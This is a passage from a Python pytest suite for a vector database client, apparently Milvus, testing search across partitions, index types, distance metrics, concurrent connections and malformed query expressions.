if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
connect.release_collection(collection)
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, partition_tags=[default_tag])
assert len(res[0]) == 0
@pytest.mark.level(2)
@pytest.mark.timeout(600)
def test_search_index_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params are correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection, partition_tags=default_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query, partition_tags=[default_tag])
else:
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, partition_tags=[default_tag])
assert len(res) == nq
assert len(res[0]) == top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
@pytest.mark.level(2)
def test_search_index_partition_not_existed(self, connect, collection, get_top_k, get_nq, get_simple_index):
'''
target: test basic search function, all the search params are correct, test all index params, and build
method: search with the given vectors and tag (tag name not existed in collection), check the result
expected: error raised
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query, partition_tags=["new_tag"])
else:
connect.load_collection(collection)
with pytest.raises(Exception) as e:
connect.search(collection, query, partition_tags=["new_tag"])
@pytest.mark.level(2)
def test_search_index_partitions(self, connect, collection, get_simple_index, get_top_k):
'''
target: test basic search function, all the search params are correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = 2
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_tags=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_tags=new_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
res = connect.search(collection, query, partition_tags=[new_tag])
assert res[0]._distances[0] > epsilon
assert res[1]._distances[0] > epsilon
connect.release_collection(collection)
@pytest.mark.level(2)
def test_search_index_partitions_B(self, connect, collection, get_simple_index, get_top_k):
'''
target: test basic search function, all the search params are correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = 2
tag = "tag"
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_tags=tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_tags=new_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, new_entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query, partition_tags=["(.*)tag"])
assert not check_id_result(res[0], ids[0])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
res = connect.search(collection, query, partition_tags=["new(.*)"])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
connect.release_collection(collection)
@pytest.mark.level(2)
def test_search_ip_flat(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params are correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP")
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res[0]) == top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
@pytest.mark.level(2)
def test_search_ip_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params are correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert check_id_result(res[0], ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
@pytest.mark.level(2)
def test_search_ip_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params are correct, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
expected: the length of the result is top_k, search collection with partition tag return empty
'''
top_k = get_top_k
nq = get_nq
metric_type = "IP"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type=metric_type,
search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
res = connect.search(collection, query, partition_tags=[default_tag])
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_search_ip_index_partitions(self, connect, collection, get_simple_index, get_top_k):
'''
target: test basic search function, all the search params are correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = 2
metric_type = "IP"
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_tags=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_tags=new_tag)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
res = connect.search(collection, query, partition_tags=["new_tag"])
assert res[0]._distances[0] < 1 - gen_inaccuracy(res[0]._distances[0])
# TODO:
# assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
@pytest.mark.level(2)
def test_search_without_connect(self, dis_connect, collection):
'''
target: test search vectors without connection
method: use a disconnected client instance and call the search method
expected: raise exception
'''
with pytest.raises(Exception) as e:
res = dis_connect.search(collection, default_query)
def test_search_collection_not_existed(self, connect):
'''
target: search collection not existed
method: search with a random collection_name that does not exist in the db
expected: status not ok
'''
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
res = connect.search(collection_name, default_query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_distance_l2(self, connect, collection):
'''
target: search collection, and check the result: distance
method: compare the returned distance with the value computed using the Euclidean (L2) distance
expected: the returned distance equals the computed value
'''
nq = 2
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
search_params=search_param)
inside_query, inside_vecs = gen_query_vectors(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = l2(vecs[0], inside_vecs[0])
distance_1 = l2(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, query)
assert abs(np.sqrt(res[0]._distances[0]) - min(distance_0, distance_1)) <= gen_inaccuracy(res[0]._distances[0])
def test_search_distance_l2_after_index(self, connect, id_collection, get_simple_index):
'''
target: search collection, and check the result: distance
method: compare the returned distance with the value computed using the Euclidean (L2) distance
expected: the returned distance equals the computed value
'''
index_type = get_simple_index["index_type"]
nq = 2
entities, ids = init_data(connect, id_collection, auto_id=False)
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
search_params=search_param)
inside_vecs = entities[-1]["values"]
min_distance = 1.0
min_id = None
for i in range(default_nb):
tmp_dis = l2(vecs[0], inside_vecs[i])
if min_distance > tmp_dis:
min_distance = tmp_dis
min_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, query)
tmp_epsilon = epsilon
check_id_result(res[0], min_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(np.sqrt(res[0]._distances[0]) - min_distance) <= tmp_epsilon
@pytest.mark.level(2)
def test_search_distance_ip(self, connect, collection):
'''
target: search collection, and check the result: distance
method: compare the returned distance with the value computed using the inner product
expected: the returned distance equals the computed value
'''
nq = 2
metirc_type = "IP"
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metric_type,
search_params=search_param)
inside_query, inside_vecs = gen_query_vectors(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = ip(vecs[0], inside_vecs[0])
distance_1 = ip(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, query)
assert abs(res[0]._distances[0] - max(distance_0, distance_1)) <= epsilon
def test_search_distance_ip_after_index(self, connect, id_collection, get_simple_index):
'''
target: search collection, and check the result: distance
method: compare the returned distance with the value computed using the inner product
expected: the returned distance equals the computed value
'''
index_type = get_simple_index["index_type"]
nq = 2
metirc_type = "IP"
entities, ids = init_data(connect, id_collection, auto_id=False)
get_simple_index["metric_type"] = metirc_type
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metric_type,
search_params=search_param)
inside_vecs = entities[-1]["values"]
max_distance = 0
max_id = None
for i in range(default_nb):
tmp_dis = ip(vecs[0], inside_vecs[i])
if max_distance < tmp_dis:
max_distance = tmp_dis
max_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, query)
tmp_epsilon = epsilon
check_id_result(res[0], max_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(res[0]._distances[0] - max_distance) <= tmp_epsilon
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_distance_jaccard_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the returned distance with the value computed using the Jaccard distance
expected: the returned distance equals the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = jaccard(query_int_vectors[0], int_vectors[0])
distance_1 = jaccard(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="JACCARD")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.level(2)
def test_search_binary_flat_with_L2(self, connect, binary_collection):
'''
target: search binary_collection with an incompatible metric type
method: search the binary collection using the L2 metric
expected: exception raised
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="L2")
with pytest.raises(Exception) as e:
connect.search(binary_collection, query)
@pytest.mark.level(2)
def test_search_distance_hamming_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the returned distance with the value computed using the Hamming distance
expected: the returned distance equals the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = hamming(query_int_vectors[0], int_vectors[0])
distance_1 = hamming(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="HAMMING")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert abs(res[0][0].distance - min(distance_0, distance_1).astype(float)) <= epsilon
@pytest.mark.level(2)
def test_search_distance_substructure_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: search with new random binary entities and SUBSTRUCTURE metric type
expected: an empty result is returned
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = substructure(query_int_vectors[0], int_vectors[0])
distance_1 = substructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq,
metric_type="SUBSTRUCTURE")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_search_distance_substructure_flat_index_B(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: search with sub-vectors generated from the inserted entities
expected: the matching inserted entities are returned with near-zero distance
'''
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_sub_vectors(int_vectors, 2)
query, vecs = gen_query_vectors(binary_field_name, entities, top_k, nq, metric_type="SUBSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert res[0][0].distance <= epsilon
assert res[0][0].id == ids[0]
assert res[1][0].distance <= epsilon
assert res[1][0].id == ids[1]
@pytest.mark.level(2)
def test_search_distance_superstructure_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: search with new random binary entities and SUPERSTRUCTURE metric type
expected: an empty result is returned
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = superstructure(query_int_vectors[0], int_vectors[0])
distance_1 = superstructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq,
metric_type="SUPERSTRUCTURE")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_search_distance_superstructure_flat_index_B(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: search with super-vectors generated from the inserted entities using the SUPERSTRUCTURE metric
expected: the matching inserted entities are returned with near-zero distance
'''
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_super_vectors(int_vectors, 2)
query, vecs = gen_query_vectors(binary_field_name, entities, top_k, nq, metric_type="SUPERSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert len(res[0]) == 2
assert len(res[1]) == 2
assert res[0][0].id in ids
assert res[0][0].distance <= epsilon
assert res[1][0].id in ids
assert res[1][0].distance <= epsilon
@pytest.mark.level(2)
def test_search_distance_tanimoto_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the returned distance with the value computed using the Tanimoto distance
expected: the returned distance equals the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = tanimoto(query_int_vectors[0], int_vectors[0])
distance_1 = tanimoto(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="TANIMOTO")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert abs(res[0][0].distance - min(distance_0, distance_1)) <= epsilon
@pytest.mark.level(2)
@pytest.mark.timeout(300)
def test_search_concurrent_multithreads(self, connect, args):
'''
target: test concurrent search with multiple threads
method: search from 4 threads, each using its own connection
expected: status ok and the returned vectors should be query_records
'''
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(uid)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
connect.load_collection(collection)
def search(milvus):
res = milvus.search(collection, default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
t = MyThread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.level(2)
@pytest.mark.timeout(300)
def test_search_concurrent_multithreads_single_connection(self, connect, args):
'''
target: test concurrent search with multiple threads
method: search from 4 threads sharing a single connection
expected: status ok and the returned vectors should be query_records
'''
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(uid)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
connect.load_collection(collection)
def search(milvus):
res = milvus.search(collection, default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
t = MyThread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.level(2)
def test_search_multi_collections(self, connect, args):
'''
target: test search multi collections of L2
method: add vectors into 10 collections, and search
expected: search status ok, and each result has the expected length
'''
num = 10
top_k = 10
nq = 20
collection_names = []
for i in range(num):
collection = gen_unique_str(uid + str(i))
connect.create_collection(collection, default_fields)
collection_names.append(collection)
entities, ids = init_data(connect, collection)
assert len(ids) == default_nb
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
for i in range(nq):
assert check_id_result(res[i], ids[i])
assert res[i]._distances[0] < epsilon
assert res[i]._distances[1] > epsilon
for i in range(num):
connect.drop_collection(collection_names[i])
@pytest.mark.skip("r0.3-test")
def _test_query_entities_with_field_less_than_top_k(self, connect, id_collection):
"""
target: test search with field, where fewer entities than top_k may be returned
method: insert entities, build an IVF_FLAT index, and search with a field filter and nprobe=1
expected: the int64 field of each returned entity equals its id
"""
entities, ids = init_data(connect, id_collection, auto_id=False)
simple_index = {"index_type": "IVF_FLAT", "params": {"nlist": 200}, "metric_type": "L2"}
connect.create_index(id_collection, field_name, simple_index)
# logging.getLogger().info(connect.get_collection_info(id_collection))
top_k = 300
default_query, default_query_vecs = gen_query_vectors(field_name, entities, top_k, nq,
search_params={"nprobe": 1})
expr = {"must": [gen_default_vector_expr(default_query)]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(id_collection)
res = connect.search(id_collection, query, fields=["int64"])
assert len(res) == nq
for r in res[0]:
assert getattr(r.entity, "int64") == getattr(r.entity, "id")
class TestSearchDSL(object):
"""
******************************************************************
# The following cases are used to build invalid query expr
******************************************************************
"""
def test_query_no_must(self, connect, collection):
'''
method: build query without must expr
expected: error raised
'''
# entities, ids = init_data(connect, collection)
query = update_query_expr(default_query, keep_old=False)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_no_vector_term_only(self, connect, collection):
'''
method: build query without vector only term
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_term_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_no_vector_range_only(self, connect, collection):
'''
method: build query without vector only range
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_range_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_vector_only(self, connect, collection):
entities, ids = init_data(connect, collection)
connect.load_collection(collection)
res = connect.search(collection, default_query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_wrong_format(self, connect, collection):
'''
method: build query without must expr, with wrong expr name
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must1": [gen_default_term_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_empty(self, connect, collection):
'''
method: search with empty query
expected: error raised
'''
query = {}
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build valid query expr
******************************************************************
"""
@pytest.mark.level(2)
def test_query_term_value_not_in(self, connect, collection):
'''
method: build query with vector and term expr, where no entities match the term values
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[100000])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO:
@pytest.mark.level(2)
def test_query_term_value_all_in(self, connect, collection):
'''
method: build query with vector and term expr, where all term values match inserted entities
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[1])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 1
# TODO:
@pytest.mark.level(2)
def test_query_term_values_not_in(self, connect, collection):
'''
method: build query with vector and term expr, where no entities match the term values
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(values=[i for i in range(100000, 100010)])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO:
def test_query_term_values_all_in(self, connect, collection):
'''
method: build query with vector and term expr, where all term values match inserted entities
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr()]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
limit = default_nb // 2
for i in range(nq):
for result in res[i]:
logging.getLogger().info(result.id)
assert result.id in ids[:limit]
# TODO:
def test_query_term_values_parts_in(self, connect, collection):
'''
method: build query with vector and term expr, where only part of the term values match inserted entities
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(
values=[i for i in range(default_nb // 2, default_nb + default_nb // 2)])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
# TODO:
@pytest.mark.level(2)
def test_query_term_values_repeat(self, connect, collection):
'''
method: build query with vector and term expr, with the same values
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(values=[1 for i in range(1, default_nb)])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 1
# TODO:
def test_query_term_value_empty(self, connect, collection):
'''
method: build query with term value empty
expected: empty result returned
'''
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_complex_dsl(self, connect, collection):
'''
method: query with complicated dsl
expected: no error raised
'''
expr = {"must": [
{"must": [{"should": [gen_default_term_expr(values=[1]), gen_default_range_expr()]}]},
{"must": [gen_default_vector_expr(default_query)]}
]}
logging.getLogger().info(expr)
query = update_query_expr(default_query, expr=expr)
logging.getLogger().info(query)
connect.load_collection(collection)
res = connect.search(collection, query)
logging.getLogger().info(res)
"""
******************************************************************
# The following cases are used to build invalid term query expr
******************************************************************
"""
@pytest.mark.level(2)
def test_query_term_key_error(self, connect, collection):
'''
method: build query with term key error
expected: Exception raised
'''
expr = {"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(keyword="terrm", values=[i for i in range(default_nb // 2)])]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.fixture(
scope="function",
params=gen_invalid_term()
)
def get_invalid_term(self, request):
return request.param
@pytest.mark.level(2)
def test_query_term_wrong_format(self, connect, collection, get_invalid_term):
'''
method: build query with wrong format term
expected: Exception raised
'''
entities, ids = init_data(connect, collection)
term = get_invalid_term
expr = {"must": [gen_default_vector_expr(default_query), term]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_query_term_field_named_term(self, connect, collection):
'''
method: build query with field named "term"
expected: error raised
'''
term_fields = add_field_default(default_fields, field_name="term")
collection_term = gen_unique_str("term")
connect.create_collection(collection_term, term_fields)
term_entities = add_field(entities, field_name="term")
ids = connect.insert(collection_term, term_entities)
assert len(ids) == default_nb
connect.flush([collection_term])
# count = connect.count_entities(collection_term)
# assert count == default_nb
stats = connect.get_collection_stats(collection_term)
assert stats["row_count"] == default_nb
term_param = {"term": {"term": {"values": [i for i in range(default_nb // 2)]}}}
expr = {"must": [gen_default_vector_expr(default_query),
term_param]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection_term)
res = connect.search(collection_term, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
connect.drop_collection(collection_term)
@pytest.mark.level(2)
def test_query_term_one_field_not_existed(self, connect, collection):
'''
method: build query with a term expr on two fields, one of which does not exist
expected: exception raised
'''
entities, ids = init_data(connect, collection)
term = gen_default_term_expr()
term["term"].update({"a": [0]})
expr = {"must": [gen_default_vector_expr(default_query), term]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build invalid and valid range query expr
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_range_key_error(self, connect, collection):
'''
method: build query with range key error
expected: Exception raised
'''
range = gen_default_range_expr(keyword="ranges")
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.fixture(
scope="function",
params=gen_invalid_range()
)
def get_invalid_range(self, request):
return request.param
@pytest.mark.level(2)
def test_query_range_wrong_format(self, connect, collection, get_invalid_range):
'''
method: build query with wrong format range
expected: Exception raised
'''
entities, ids = init_data(connect, collection)
range = get_invalid_range
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_query_range_string_ranges(self, connect, collection):
'''
method: build query with string-valued range bounds
expected: raise Exception
'''
entities, ids = init_data(connect, collection)
ranges = {"GT": "0", "LT": "1000"}
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_query_range_invalid_ranges(self, connect, collection):
'''
method: build query with a contradictory range (GT > LT)
expected: empty result (0 hits)
'''
entities, ids = init_data(connect, collection)
ranges = {"GT": default_nb, "LT": 0}
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res[0]) == 0
@pytest.fixture(
scope="function",
